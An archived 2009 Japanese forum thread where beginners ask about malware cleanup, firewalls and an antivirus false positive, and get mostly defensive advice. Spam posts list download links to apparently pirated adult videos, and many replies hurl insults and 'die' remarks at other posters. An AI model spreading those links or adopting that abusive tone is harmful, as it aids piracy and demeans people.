前述の削除されたマルウェアのファイル名にもWin32とありましたが、Win32がなんなのかわからず、検索も出来ない状態なので2ちゃんねるに書き込むことにした次第です。

長文で申し訳ありませんが、ご指導お願いいたします。また、板違いでありましたら誘導していただけたらと思います。
66名無しさん@お腹いっぱい。:2009/07/07(火) 12:02:01
ZoneAlarmのフリーの日本語版が1年も更新されないので移行を考えてます。
Comodoファイアーウォールはよく散見されるように、そんなに設定が難かしいのでしょうか?
67名無しさん@お腹いっぱい。:2009/07/07(火) 12:37:27
>>65
ウイルスなどでおかしくなった環境は、フォーマットしてOSから全部
再インストール(リカバリー)するのが一番確実かつウダウダ悩むより
早い訳だが、それはどうしてもやりたくないのか?

>>66
Comodo Firewall @ Wikiなどの説明の多さを見ただけで敬遠する人も
多いんだろうなw
理解して設定した方が良いのは当然だが、最初は解説サイトの設定例を
丸写しでもすればそんなに面倒臭くもない。
68名無しさん@お腹いっぱい。:2009/07/07(火) 12:59:46
>>65
PCリカバリ。メーカー製でない場合はOS再インストール。
6965:2009/07/07(火) 14:00:05
>>67-68
ご回答ありがとうございます。やはり再インストールですか。
リカバリしたくないというわけではないのですが、自動更新後おかしくなったということで
ウイルスではなく、Windowsアップデートによる何かの不具合なのかなと思ったもので。
HTMLが開けない以外は正常ぽいので、リカバリせずにいけるならそちらの方がいいと思った次第です。
ピンポイントでIEが起動できなくなるウイルスというのがあるのでしょうか?
他にご回答がないようでしたらリカバリしてみようと思います。ありがとうございました。
7065:2009/07/07(火) 14:07:44
失礼しました。
>ピンポイントでIEが起動できなくまる
→HTMLが開けなくなるの間違いです
71名無しさん@お腹いっぱい。:2009/07/07(火) 14:24:20
>>69
> Windowsアップデートによる何かの不具合
ではなく >>65 で自ら書いているように
> 悪意あるマルウェアを削除
が原因になる。
悪意のあるマルウェアに今回のトラブルに関連した重要な部分を
置き換えられていて、それらを削除されたから問題が出た、と。
で、どれを削除されたかも覚えてなく、
(ログはどこかにあった気がするが、削除された数が数だし…)
> Win32モードでは起動できません
この手のトラブルまで起きているならリカバリーした方が早い。
HTMLが開けないだけなら、IEの修復などで直りそうだが。
72名無しさん@お腹いっぱい。:2009/07/07(火) 14:58:13
(ο^д^)ノシ
73名無しさん@お腹いっぱい。:2009/07/07(火) 21:21:14
ポート23015に物凄い勢いでアクセスしている何かがいるんですが
これ何ですか。
IP変えたりしながら5秒毎に来るんですが。
74名無しさん@お腹いっぱい。:2009/07/07(火) 21:43:49
不正アクセスでしょ
75名無しさん@お腹いっぱい。:2009/07/07(火) 21:52:59
いや、それはわかっているんですが、
1時間半で1200件というのは今までになかったんですよ。
特定のポート(23015)だけに5秒毎にアクセスするようなボットとかあるんですかね。
76 ◆N9P3SuvBPo :2009/07/07(火) 22:36:41
Microsoft Video ActiveXとかいうのに脆弱性か…
俺の環境では全然影響の無いことですが、他のみんなは気を付けろ。
ゼロデイだから。
ttp://headlines.yahoo.co.jp/hl?a=20090707-00000015-rbb-sci
77名無しさん@お腹いっぱい。:2009/07/07(火) 22:53:09
       /二ニ=-、
  /> r-(⌒ヽ⌒ヽ
 /ソ ̄/ /\ \ ヽ
// // |\ |\|
/      | ヾ
      | ̄|
      |万|
      |馬|
      |券|
      |_|
78名無しさん@お腹いっぱい。:2009/07/07(火) 22:54:05
>>76
あなたの環境を教えてください
ここで晒せば少しはRecoveryする奴も減るんじゃね?
79名無しさん@お腹いっぱい。:2009/07/07(火) 22:56:45
IEを使わなければいい
80名無しさん@お腹いっぱい。:2009/07/07(火) 22:59:28
>>76
ロムってる者ですが、そういう情報助かります
81 ◆N9P3SuvBPo :2009/07/07(火) 23:15:42
>78
とりあえず、XPなら制限ユーザー、Vistaおよび7なら標準ユーザーを常用し、
DEP(データ実行防止)機能を全てのプログラムに対してやっとくこと。
これだけでもかなり違う。
あと件の脆弱性ですが、記事にも書いてあるとおり、
>Windows VistaおよびWindows Server 2008は影響を受けない。
とのことです。

Windows7はどうだろう?
XPモード時だとやはり影響受けるのかな?
82名無しさん@お腹いっぱい。:2009/07/07(火) 23:47:44
scrのファイル踏んでしまった

ファイルのほとんどがT605の拡張子で237kbになってしまった

ほんとにファイルはあぼーんになったの?

どうすればいい?

助けてください。
83 ◆N9P3SuvBPo :2009/07/07(火) 23:53:10
>82
マルチはらめぇ!!
84名無しさん@お腹いっぱい。:2009/07/07(火) 23:54:42
WinXP で NortonInternetSecurity を使っています。
ファイヤーウォールに関してなんですが、特定の人物からのアクセスを可能な限り
遮断したいと思っています。 IP単位で指定してブロックはわかるのですが、
リモートホスト名を正規表現で指定してブロックすることができるソフトってありませんか?
そもそも理屈として無理なのかな?とも思うのですが、
似たようなことを実現できる手法・ソフトがあれば教えてください。
85名無しさん@お腹いっぱい。:2009/07/07(火) 23:57:36
なぜ制限ユーザー?
不便じゃね
86名無しさん@お腹いっぱい。:2009/07/08(水) 00:39:00
>>81
IEを使わなければいいだけ
87名無しさん@お腹いっぱい。:2009/07/08(水) 00:42:06
2chからAV女優サイトに飛ばされたらTrojan.Zlob が
入ってしまいました、ノートンは入ってますが反応しません。
朝大量に画面が出てよく分からないままで、どうすればいいか
分かりません、お願いします。
88名無しさん@お腹いっぱい。:2009/07/08(水) 00:47:19
   ハ,,ハ
   (゚ω゚ )        おこと
  ⊂  ⊂) ∧_∧  
⊂二⌒⊂( ゜Д゜)    
       γ 二つ つ
       {   (
       ヽ,_)ヽ,_)
      



     ハ,,ハ ∧_∧
     (    )∩;;)3゙゚').・:;  わり
   Oゝ   ノ、  O)
    /   )  (   \
    ( / ̄∪  ∪ ̄\)


  .゚:。。:.
    :゚  _∩゚:・
   . ゚:⊂/  ノ )
     /  γ
  .・  し⌒J
   ゚。:
  ハ,,ハ
 ( ゚ ω∩     します
 ο  ノ
/_ O
'(ノ
89八頭 ◆YAGApwSaEw :2009/07/08(水) 01:09:49
>>87
僕が指示を出すから
【ノートン】Norton Internet Security Ver.168【2009】
http://pc11.2ch.net/test/read.cgi/sec/1244948659/ へ移動して、
>>2の報告・質問用テンプレートを使って再相談
90名無しさん@お腹いっぱい。:2009/07/08(水) 01:14:53
【使用OS】      『XP SP3』
【PCスペック】    『CPU:1.73GHz 、メモリ:1.49GB
【使用ブラウザ】  『IE8』 
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】     『ウイルスセキュリティzero 2009年』 
【回線の種類・ルータの有無】  『光回線でルータ使用中』 

【具体的な症状】 ニコニコ動画サイト全体が読み込めない
【過程と措置】ウイルスセキュリティzeroの設定から、「すべての機能を無効にする」にすると普通に見れるようになる。
       このまま無効にしておけばよいといいたいところでしょうが、なんか不安なのでこのセキュリティを起動したまま
       ニコニコ動画を見れるようにするにはどうしたらよいでしょうか。
【その他】  ようつべは問題なし。
91名無しさん@お腹いっぱい。:2009/07/08(水) 01:18:05
>>90
明日サポートに相談
92名無しさん@お腹いっぱい。:2009/07/08(水) 01:32:44
>>90
つ 取説のトラブルシューティング
93名無しさん@お腹いっぱい。:2009/07/08(水) 01:36:27
>>90
zeroは辞めた方が良いね。人それぞれかも知れないが
サポートも弱いしオススメはしない。しかも完全削除ツールも
無いから残骸が残る。
NIS、マカ辺りが使いやすいと思う。VBは・・・自己責任でw
他にG DATA、KIS他とかもあるが初心者だとどうかな
94名無しさん@お腹いっぱい。:2009/07/08(水) 01:54:24
>>93 同感。2009版以降のスレ見たり、最近の状況を読んでみたらよい。色々書いてあるけど、
   自分で判断すればいいっしょ。McAfeeとか、安定してるから使ってみると良いと思うよ。
95名無しさん@お腹いっぱい。:2009/07/08(水) 01:57:51
【使用OS】      『XP MCE SP3』
【PCスペック】    『CPU:C2D1.86GHz 、メモリ:3.00GB
【使用ブラウザ】  『Lunascape 5.0 (Gecko/Trident併用)』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】     『KIS 7.0』 
【回線の種類・ルータの有無】  『光回線でルータ使用(無線/Macホワイトリストのみ許可/数ポート開放)』 

【具体的な症状】
PCつけっぱのまま外出、先ほど帰宅したところ、画面にウイルス警告が出ていた。
検出名:Trojan.Win32.Vapsup.uie
ファイル:C:\Program Files\上海アリス幻樂団\東方地霊殿\th11.exe

【過程と措置】
1.とりあえず削除を選択。
2.対象ディレクトリからファイルが削除されていることを確認。
3.警告ウインドウに出ていたリンクより情報の取得を試みるも、KasperskyLabには該当項目なし。
ttp://www.viruslistjp.com/search?VN=Trojan.Win32.Vapsup.uie&referer=kis

4.検出名でぐぐってみたところ、ウイルスの別名リストを発見。
http://www.threatexpert.com/threats/trojan-win32-vapsup.html

5.トレンドマイクロのページに主導削除の方法が記載されていた為、実行を試みる。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FBHO%2ESK&VSect=Sn

6.ところが、記載されているようなレジストリの値/キーが存在せず、対応ができない。
7.現在Kasperskyのファイルスキャンを実行中。
8.終了次第FScanのオンラインスキャナでのスキャンを実行予定。

続く
96名無しさん@お腹いっぱい。:2009/07/08(水) 01:59:22
【その他】
1.該当ファイルの内容は去年の夏ごろにインストールを行った同人ソフトと考えられる。
2.当然ながら割れ物などではなく、購入先はコミックマーケット(2008年夏)。
3.調べ方が正しいのであれば、該当のウイルスは単体のワームであり、ファイルへの感染は行わない。
4.大手サークルの頒布物であり、現在までウイルス情報もなく、CDにウイルスが入っているとは考えにくい。
5.去年の夏に頒布されたものである為、今になってウイルスとして検出されるとは考えにくい。

現在、以上のような状態になっていますが、本当にこの調べ方/対応方法であっているかどうか、素人の為判断がつきません。
セキュリティについて詳しい皆さんであれば、同様のケースに対する情報等お持ちではないかと思い、ご相談させていただきました。
97八頭 ◆YAGApwSaEw :2009/07/08(水) 02:21:04
>>95-96
駆除に関しては問題無いみたいだけど(半年以上検出しなかったのは問題だけど・・・)
文章からして誤検出と判断しているんだろうけども
このケースは意図的な大量配布の可能性もあると思う。

>>6のIPA情報処理推進機構 (情報セキュリティに関する届出)  へ連絡を取って調べてもらうのがいいと思う
*コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設置

なるべく多くのセキュリティベンダへ検体提出してもらうのがいいと思う。
98名無しさん@お腹いっぱい。:2009/07/08(水) 02:25:32
地霊殿てのが微妙な……
まあ、VB2007でもth11.exeが隔離されると言う現象があったらしいですが。

ご使用のソフトは、カスペルスキーですね?
http://schiphol.2ch.net/test/read.cgi/gamestg/1219041957/644-645
ここの情報から更新後、ウイルスとして検出された可能性もあります。

VTで該当ファイルを検査されるとはっきりすると思いますが。
COMODO、Aviraでも同様に、th11.exeの検出報告が相次いでいるようです。
99名無しさん@お腹いっぱい。:2009/07/08(水) 02:27:37
そんなもんでオタオタする奴がなんで
 >数ポート開放) してんのよ ?
100八頭 ◆YAGApwSaEw :2009/07/08(水) 02:39:03
某ブログにF-Secureのオンラインスキャンでも同パスの検出例があった
Symantecへは連絡だけしておきました
101名無しさん@お腹いっぱい。:2009/07/08(水) 02:41:17
>>100
GENOの感染経歴もある人のBLOGなら
同じところみましたね。
102名無しさん@お腹いっぱい。:2009/07/08(水) 02:43:12
>>97
>>98
貴重な情報有難うございます。

先ほど検出可否報告スレよりウイルス詰め合わせをダウンロードし検出テストを行った結果、
KAV使用の別の方が検出を行ったものと同数のファイルが検出されました為、
少なくともローカルのKAVの検出機能に障害は発生していないようです。

恐らく皆さんがおっしゃるように語検出ではないかと思いますが、
念の為地霊殿再インストールの後、exeを検体としてIPAに提出しようかと思います。
助言いただき有難うございました。


>>99
使用しているポートは絞っており、ポートスキャンにより他のサービスが動いていないことを確認済みです。
しかしながら、セキュリティに関して絶対の自信を持っているわけではないので、
自分以外の信用が置けるソースからの情報が得られないと不安でなりません。

自分の調べ方に不足が合ったようで、お手数をおかけ申し訳ございませんでした。
重ね重ね有難うございました。
103名無しさん@お腹いっぱい。:2009/07/08(水) 02:44:38
>>102
ついでに神主さんにも教えてあげると良いかも。
104八頭 ◆YAGApwSaEw :2009/07/08(水) 02:54:11
>>102
再インストールしないで
まず連絡とって検体提出方法の指示をもらうように
105名無しさん@お腹いっぱい。:2009/07/08(水) 02:58:02
まあ誤検出だろうし
製作者じゃないけど、問題ないだろ

多分
106名無しさん@お腹いっぱい。:2009/07/08(水) 02:59:37
F-SecureのエンジンにはAVPがあったと思う
まあ、検出するのも無理はない
107名無しさん@お腹いっぱい。:2009/07/08(水) 03:02:35
>>102
どうやらCDからも検出されたようです
まあ、誤検出確定かも知れんね
108名無しさん@お腹いっぱい。:2009/07/08(水) 03:50:04
>>89
>>14

>>82 >>87
諦めてPCリカバリしろ。
他の方法では対処できません。理由は>40とか>43辺りを読んでください。

>>90
ZEROは使ったこと無いけど、ペアレンタルコントロールかなにか入れてないか?
子供に有害なサイトを見させないためのフィルタリングで引っ掛かってるだけじゃないかな。

個人的にはそんなソフト捨てて、もっとまともなセキュリティソフトを入れなさいと。
109名無しさん@お腹いっぱい。:2009/07/08(水) 03:58:40
>>95-96
行なった手順を読む限りでは、誤検出の可能性が高いと思う。
自分が使用しているセキュリティベンダー宛に、誤検出として検体提出を。

カスペの検体提出先は Kaspersky Lab <newvirus☆kaspersky.com> ☆をアットマークに置き換えてください。

1.一時的にセキュリティソフトを切って、該当ファイルをパスワード付きZIPで圧縮する。
  パスワードは"infected"。
2.セキュリティソフトを再度有効に戻す。
3.メールタイトルに「False detection」または「False Positive」と入れる。
  メール本文もタイトルと同一文面。
  メール本文には、そのほか、回答パスワードも記載。「Extract Password : infected」
4.圧縮したファイルを添付して送信する。
5.あとはパターンの修正を待つ。

(このほかに、隔離してから提出する方法もあります)

八頭が勧めているIPAへの届け出は行なわなくていいです。というかやっちゃだめです。
あそこへの届け出は「実際に感染した」という報告なので、誤検出かもしれないものを報告する窓口ではありません。

>>104
役立たずどころか迷惑になる可能性の高い回答してんじゃねーよ。
頼むから、お前はもう出てこないでくれ。質問者にも、他の回答者にも迷惑がかかる。
110キチガイ嵐はスルー:2009/07/08(水) 04:27:12
108 名前: あぼ〜ん [あぼ〜ん] 投稿日: あぼ〜ん
あぼ〜ん
109 名前: あぼ〜ん [あぼ〜ん] 投稿日: あぼ〜ん
あぼ〜ん
111名無しさん@お腹いっぱい。:2009/07/08(水) 05:32:54
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
クボタタケシ Part.2 [HIPHOP]
【社会】日本に帰化した韓国人男性、対馬の自衛隊施設で不可解行動=施設内に記載された演習日程や人員配置など書き写す [ニュース二軍+]
●朝鮮の反日企業 口ッテ製品不買運動 4品目 ● [ハングル]
【B's社長】アルビサポスレPART34【ありがとう】 [国内サッカー]
都立新宿山吹高校part23 [お受験]
112あぼ〜ん:2009/07/08(水) 09:15:19
あぼ〜ん
113名無しさん@お腹いっぱい。:2009/07/08(水) 11:08:44
>>110
八頭もスレの監視大変だねぇ。
114名無しさん@お腹いっぱい。:2009/07/08(水) 13:07:50
そやけど、これと言ってパッとしない回答ばかりだと思うんだよね
昔のこのスレは自演ばかりだったけど、回答もしっかりとやってたし
おいらもこのスレに何度も助けられてる身だから、このスレは参考になると思う
検索サイトで斜め読みしただけのレベルで回答してる奴って正直、いらないんじゃないかと
このスレが今日も続いているのは、真面目に回答してる人達がいてこそだよねっ
回答できるスキルは全くないので、ただロムるしかできないけどねおいらは
115名無しさん@お腹いっぱい。:2009/07/08(水) 13:09:25
ハチ! もう帰ってこないんだよ!
116名無しさん@お腹いっぱい。:2009/07/08(水) 14:31:43
>>114
八頭みたいな糞のことですね
わかります
117名無しさん@お腹いっぱい。:2009/07/08(水) 16:23:34

http://hotfile.com/dl/8148692/0ad221...part1.rar.html
http://hotfile.com/dl/8148709/de152d...part2.rar.html
http://hotfile.com/dl/8148734/e7d3fe...part3.rar.html
http://hotfile.com/dl/8148741/07211e...part4.rar.html
http://hotfile.com/dl/8148766/d27fb4...part5.rar.html
http://hotfile.com/dl/8148789/72f49b...part6.rar.html
http://hotfile.com/dl/8148794/4b82fa...part7.rar.html
118名無しさん@お腹いっぱい。:2009/07/08(水) 16:39:42
http://rapidshare.com/files/198611426/pilemjav_SA_Vol03.part01.rar
http://rapidshare.com/files/198610925/pilemjav_SA_Vol03.part02.rar
http://rapidshare.com/files/198611455/pilemjav_SA_Vol03.part03.rar
http://rapidshare.com/files/198611676/pilemjav_SA_Vol03.part04.rar
http://rapidshare.com/files/198611608/pilemjav_SA_Vol03.part05.rar
http://rapidshare.com/files/198611587/pilemjav_SA_Vol03.part06.rar
http://rapidshare.com/files/198611141/pilemjav_SA_Vol03.part07.rar
http://rapidshare.com/files/198611652/pilemjav_SA_Vol03.part08.rar
http://rapidshare.com/files/198611774/pilemjav_SA_Vol03.part09.rar
http://rapidshare.com/files/198611202/pilemjav_SA_Vol03.part10.rar
119名無しさん@お腹いっぱい。:2009/07/08(水) 16:42:27
↑これ見て大丈夫なやつですか?
120名無しさん@お腹いっぱい。:2009/07/08(水) 16:56:16
>>119
この板から出て行け
121名無しさん@お腹いっぱい。:2009/07/08(水) 17:14:15
なんで?
ただ聞いただけですけど
122名無しさん@お腹いっぱい。:2009/07/08(水) 17:34:36
>>119
勇気がなくて踏めない人のための鑑定スレPart19
http://pc11.2ch.net/test/read.cgi/hack/1230787611/
123名無しさん@お腹いっぱい。:2009/07/08(水) 18:33:49
>>122
ありがとうございいます
124 ◆N9P3SuvBPo :2009/07/08(水) 18:37:34
>>114
そうですね。
真面目に質問に答えてくれる回答者がいて、このスレが成り立ってると言っても過言ではないです。
あと、ROMも勉強になりますからね。
125名無しさん@お腹いっぱい。:2009/07/08(水) 18:37:54
>>123
お前死ねよ
そんなものに興味を持つような奴にセキュやる資格なし
126名無しさん@お腹いっぱい。:2009/07/08(水) 18:58:23
ここは初心者用スレ
127名無しさん@お腹いっぱい。:2009/07/08(水) 19:07:56
初心者が回答する、初心者用スレな
128名無しさん@お腹いっぱい。:2009/07/08(水) 19:14:47
初心者は疑問を文章にまとめる事によって気づく事があり、
玄人は初心者の何気ない書き込みからひらめきを得る。
129名無しさん@お腹いっぱい。:2009/07/08(水) 19:26:11
>>128
素晴しい
130名無しさん@お腹いっぱい。:2009/07/08(水) 19:38:08
低能乙
131名無しさん@お腹いっぱい。:2009/07/08(水) 21:21:21
HPの管理人はアクセス解析でどこからアクセスしてるかわかると聞きましたがこういうのはパソコン単位で判別しているのですか?
それともリモートホスト?とかIP?とかで判別しているんでしょうか?
例えば同じ家から違うパソコンでアクセスした場合はどのように判別されるんでしょうか?
132名無しさん@お腹いっぱい。:2009/07/08(水) 21:43:00
>>131
IPアドレスやブラウザ
133名無しさん@お腹いっぱい。:2009/07/09(木) 00:45:37
環境変数。
134名無しさん@お腹いっぱい。:2009/07/09(木) 01:18:48
八頭は居る?
135名無しさん@お腹いっぱい。:2009/07/09(木) 01:54:33
いりませーん
136名無しさん@お腹いっぱい。:2009/07/09(木) 13:29:19


http://www.share-online.biz/download.php?id=EZQHDFMK98
http://www.share-online.biz/download...d=QXDJDFMKUMM0
http://www.share-online.biz/download.php?id=QOFLDFMKUK
http://www.share-online.biz/download.php?id=LW6IDFMKLNX
http://www.share-online.biz/download.php?id=5XYJDFMKXU
http://www.share-online.biz/download.php?id=7I7IDFMK6J
http://www.share-online.biz/download.php?id=6CJGDFMKNC
http://www.share-online.biz/download.php?id=PTRIDFMKXF4
137名無しさん@お腹いっぱい。:2009/07/09(木) 13:30:44
http://hotfile.com/dl/5580003/8fedeca/TokyoHot.k0173.EmikoSato.avi.001.html
http://hotfile.com/dl/5580027/10e9d07/TokyoHot.k0173.EmikoSato.avi.002.html
http://hotfile.com/dl/5580083/3878444/TokyoHot.k0173.EmikoSato.avi.003.html
http://hotfile.com/dl/5580119/f185628/TokyoHot.k0173.EmikoSato.avi.004.html
http://hotfile.com/dl/5580146/50e9fbe/TokyoHot.k0173.EmikoSato.avi.005.html
http://hotfile.com/dl/5580167/44af9f3/TokyoHot.k0173.EmikoSato.avi.006.html
138名無しさん@お腹いっぱい。:2009/07/09(木) 13:31:41
http://img135.picfoco.com/showimg.php?id=999351488&v=2246565421&ext=jpg&dt=1

http://hotfile.com/dl/5578962/f4f45be/TokyoHot.n0402.MeguHosokawa.avi.001.html
http://hotfile.com/dl/5578990/a10709b/TokyoHot.n0402.MeguHosokawa.avi.002.html
http://hotfile.com/dl/5579025/87afc8f/TokyoHot.n0402.MeguHosokawa.avi.003.html
http://hotfile.com/dl/5579052/f9f2f2c/TokyoHot.n0402.MeguHosokawa.avi.004.html
http://hotfile.com/dl/5579074/3547031/TokyoHot.n0402.MeguHosokawa.avi.005.html
http://hotfile.com/dl/5579234/0ef06ce/TokyoHot.n0402.MeguHosokawa.avi.006.html
http://hotfile.com/dl/5579258/155a1e8/TokyoHot.n0402.MeguHosokawa.avi.007.html
http://hotfile.com/dl/5579281/f24678f/TokyoHot.n0402.MeguHosokawa.avi.008.html
http://hotfile.com/dl/5579308/1a1bc01/TokyoHot.n0402.MeguHosokawa.avi.009.html
http://hotfile.com/dl/5579330/6221e95/TokyoHot.n0402.MeguHosokawa.avi.010.html
139名無しさん@お腹いっぱい。:2009/07/09(木) 13:33:46
http://rapidshare.com/files/241920917/TH.406-MT.avi.001
http://rapidshare.com/files/241918171/TH.406-MT.avi.002
http://rapidshare.com/files/241923856/TH.406-MT.avi.003
http://rapidshare.com/files/241923391/TH.406-MT.avi.004
http://rapidshare.com/files/241918799/TH.406-MT.avi.005
http://rapidshare.com/files/241920987/TH.406-MT.avi.006
http://rapidshare.com/files/241920946/TH.406-MT.avi.007
http://rapidshare.com/files/241921218/TH.406-MT.avi.008

http://img123.hotlinkimage.com/img.php?id=454358218&q=&jump=1663012113&ru=aHR0cDovL3d3dy5ha2liYS1vbmxpbmUuY29tL2ZvcnVtL3Nob3d0aHJlYWQucGhwP3Q9ODQyMDc%3D
140名無しさん@お腹いっぱい。:2009/07/09(木) 13:41:36


http://www.megaupload.com/?d=CW0N0W7O
http://www.megaupload.com/?d=HRL8M8OX
http://www.megaupload.com/?d=X2TAD64W
http://www.megaupload.com/?d=HO1I4RCC
http://www.megaupload.com/?d=EC1YQSTR
http://www.megaupload.com/?d=N5MCR9VJ
http://www.megaupload.com/?d=W51Q2YK3
http://www.megaupload.com/?d=L52QNRA5
http://www.megaupload.com/?d=26PQIKUJ
http://www.megaupload.com/?d=GFZ3KGCA
141名無しさん@お腹いっぱい。:2009/07/09(木) 16:26:28
>>114
わろた

おい八頭!
>>114はお前へのメッセージだぜ!
142名無しさん@お腹いっぱい。:2009/07/09(木) 21:44:57

30 名前:八頭 ◆YAGApwSaEw [sage] 投稿日:2009/07/09(木) 21:43:45
ttp://h.imagehost.org/0500/WS006538.jpg

NIS2010βのインストーラーがエラーでDL出来なかったorz
英文メールを送ったら、わずか数分後に返信が届いていたw
『追って連絡します』とのこと

ピザ屋の出前かよ!
143名無しさん@お腹いっぱい。:2009/07/09(木) 21:45:47
ハチ ご主人様はもう帰ってこないんだよ ハチ
144名無しさん@お腹いっぱい。:2009/07/09(木) 21:56:43
>>142
こんな糞なトーシロがアドバイスとか笑わせる
145名無しさん@お腹いっぱい。:2009/07/09(木) 23:23:09
友人にノートパソコンを譲ることになりました。
しかし、そのパソコンは親父が使っていたもので、親父の個人情報などがネットから流出する可能性もあります。

目に付くものは手当たり次第消したのですが、これでは不十分ですよね?
リカバリソフトを持っていないのですが、どうしたらそのパソコンの個人情報を極力消去して初期状態に戻すことができますか?

ちなみに、その友人が悪用するとかそういうことを気にしているわけではないです。
むしろ、PC関係に疎すぎるのでウイルスとかに感染しないかが心配なのです。


よろしくお願いします。
146名無しさん@お腹いっぱい。:2009/07/09(木) 23:25:41
リカバリーできないPCを素人に譲るなw
147名無しさん@お腹いっぱい。:2009/07/09(木) 23:36:06
CD無しにはリカバリをあきらめなくてはいけないということでしょうか?
148名無しさん@お腹いっぱい。:2009/07/09(木) 23:45:29
>>145-147
>CD無しにはリカバリをあきらめなくてはいけないということでしょうか?

基本的にはYes。

ノートPCの場合は、メーカーに問い合わせて、リカバリCD(有償)を入手してください。
物によっては、HDDのマウントしていない領域に、リカバリイメージが置かれている場合があり
起動時に特定のキーを押すことでリカバリを開始できるものもあります。

少なくとも、他人に譲渡する際は、リカバリしてからというのが礼儀でしょう。
リカバリできない状態のPCを他人に譲渡するのはやめたほうがいいです。
149名無しさん@お腹いっぱい。:2009/07/09(木) 23:50:31
>>174
リカバリしても未使用領域に記録されたデータはOSからは認識されてないだけで残っている。
復元できてしまう可能性有。
HDDのデータを消去できるソフトで生HDD状態にしてからリカバリするのがBEST。
150149:2009/07/09(木) 23:57:31
>>174
>>147
151145:2009/07/10(金) 00:02:20
>>148
ありがとうございます。
礼儀だったのですね。知らなかったorz
メーカーにまずは問い合わせてみます。

>>149
たとえばどういうソフトのことを言うのでしょうか?

リカバリー=HDDの初期化

だと思ってたのですが違うのですか?
152名無しさん@お腹いっぱい。:2009/07/10(金) 00:08:38
>>145
>>151ググリなさい
153149:2009/07/10(金) 00:23:52
リカバリーとはメーカー製PCを工場出荷状態に戻すこと。
ただしフォーマットしても今まで書き込んだデータを消すわけではない。
リカバリーで新しくデータが書き込まれた部分は問題ないがそれ以外の部分には
古いデータが(通常はOSからは認識できないだけで)残っている。
CD−ROMが無いとのことだが、数年前からCD−ROM無しでHDDの一部にリカバリー部分を
収めたPCが普及しているので買った時に付いていた冊子で確認してみ。
冊子が無い場合メーカーサイトから冊子を見られる可能性あり。

消去ソフトは有料も無料もある。
HDD データ消去
ttp://www.google.co.jp/search?hl=ja&rlz=1T4GGLJ_jaJP256JP264&q=HDD+%E3%83%87%E3%83%BC%E3%82%BF%E6%B6%88%E5%8E%BB&lr=
154名無しさん@お腹いっぱい。:2009/07/10(金) 01:49:00
現在WinXPsp2でavast+spybotS&Dという構成です。
ソフトも定義ファイルも常に最新の状態にしていますが、ルーターのログに不正アクセスがよく残ってます。
ウイルススキャン等をしても検出される事はありませんし、シマンテックのセキュリティスキャンもしてみましたが、オールクリアでした。
しかし、怪しい挙動や、接続インジケーターがどこかと通信してる事があったりして、不安です。

このような状況で、ファイアーウォールソフトを追加する事は有効でしょうか?
また、相性やオススメはありますか?
ちなみに、セキュリティ関係はあまり詳しくありません。
よろしくお願いします。
155名無しさん@お腹いっぱい。:2009/07/10(金) 01:51:46
質問させてや
【使用OS】      『windowsXPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】    『CPU: core2、3GHz 、メモリ: 3GB』  (「システムのプロパティ」参照)
【使用ブラウザ】  『Firefox3』 例、Firefox 3
【Microsoft Updateの更新の状態】 『最新』 例、自動更新設定
【セキュリティソフトと年式】     『Avast』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『spybot、ad-awarePRO』
【回線の種類・ルータの有無】  『光回線マンションタイプ、ルータは不明』 例、光回線でルータ使用中

【具体的な症状】 『起動時間を短縮しようとシステム構成ユーティリティの画面を開いて、スタートアップの所を見ると「ara-key」という見なれないものがありました』
【過程と措置】   『avastでスキャンしましたが見つからず、ara-keyを検索してもファイルがないと言われてしまいました』
【その他】  『ara-keyとは一体なんでしょうか?とくに怪しいサイトは見てません』
156名無しさん@お腹いっぱい。:2009/07/10(金) 02:12:56
>>155
暴露型ウイルスの形跡ではないかと思われます。
PCをリカバリし、二度とファイル共有に手を出さないように注意すること。
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.html
157155:2009/07/10(金) 02:15:47
>>156
何時何処で何時何分何秒ファイル共有ソフト使ってるって俺が言ったっていうかファイル共有ソフトは使ってないよ

あほ?
158名無しさん@お腹いっぱい。:2009/07/10(金) 02:17:21
八頭死ね
頭悪いし
死んだほうがいいよったく
ねくらだな最早
159名無しさん@お腹いっぱい。:2009/07/10(金) 02:18:48
>>157
態度でかいんだよ
お前のような奴は死ね殺されろ
160名無しさん@お腹いっぱい。:2009/07/10(金) 02:24:07
>>154
有効です。
http://eazyfox.homelinux.org/Firewall/Firewall1.htm

>ルーターを使っているならパーソナルFirewallは不要?
>ブロードバンドルーターが安価になり、自宅でも複数台のPCを利用するためルーターを使用される方が多くなってきました。
>ルーターはFirewallのパケットフィルタという機能だけを考えると同等であり、重複して使用する意味は無いと考えられる方が
>いらっしゃいます。

>しかしパーソナルFirewallはルーターには無い「アプリケーションとパケットフィルタを関連付けて制御する」ということが
>可能です。つまりルーターにとってはOutlookでメールを送信するのも、ウィルスが外部にメールを送信するのも同じで
>区別がつきませんが、パーソナルFirewallではウィルスが送信するメールだけを阻止することが可能です。同様にトロイの
>木馬が外部へデータを送るのを阻止することもパーソナルFirewallには出来ますが、ルーターでは阻止できません。

>つまりルーターだけでは安心できない、パーソナルFirewallを組み合わせて使うことが必要となります。

Outpost, Comodo,Online Armor などから好きなものを選べばいいでしょう。
私は PC Tools を使ってますが、特に重くなったとかは感じてないです。防御力はちょっと微妙ですが。

比較ページ
http://wiki.livedoor.jp/google01/d/%CC%B5%CE%C1Firewall%B0%EC%CD%F7
http://eazyfox.homelinux.org/Firewall/Firewall2.htm
http://www23.atwiki.jp/securitysoft/pages/1.html
161155:2009/07/10(金) 02:24:20
>>159
あんたじゃ話にならんわ
八頭様を呼べ
この板で最もスキルが高いと噂されてるあの八頭様を
162名無しさん@お腹いっぱい。:2009/07/10(金) 02:26:39
>>157
では、ファイル共有をやってる誰かの所から貰ってきたのかもしれませんね。
Avast以外のオンラインスキャンを利用して、複数のセキュリティソフトでスキャンしてみてください。

残骸なのか、本体が隠蔽されてるのかはわかりませんが・・・PCリカバリを推奨しておきます。
163名無しさん@お腹いっぱい。:2009/07/10(金) 02:27:34
>>161
一番スキルが低い奴呼んでどうする。本人の自作自演で出てくるのかな?

ハチ公、来なくていいぞ。
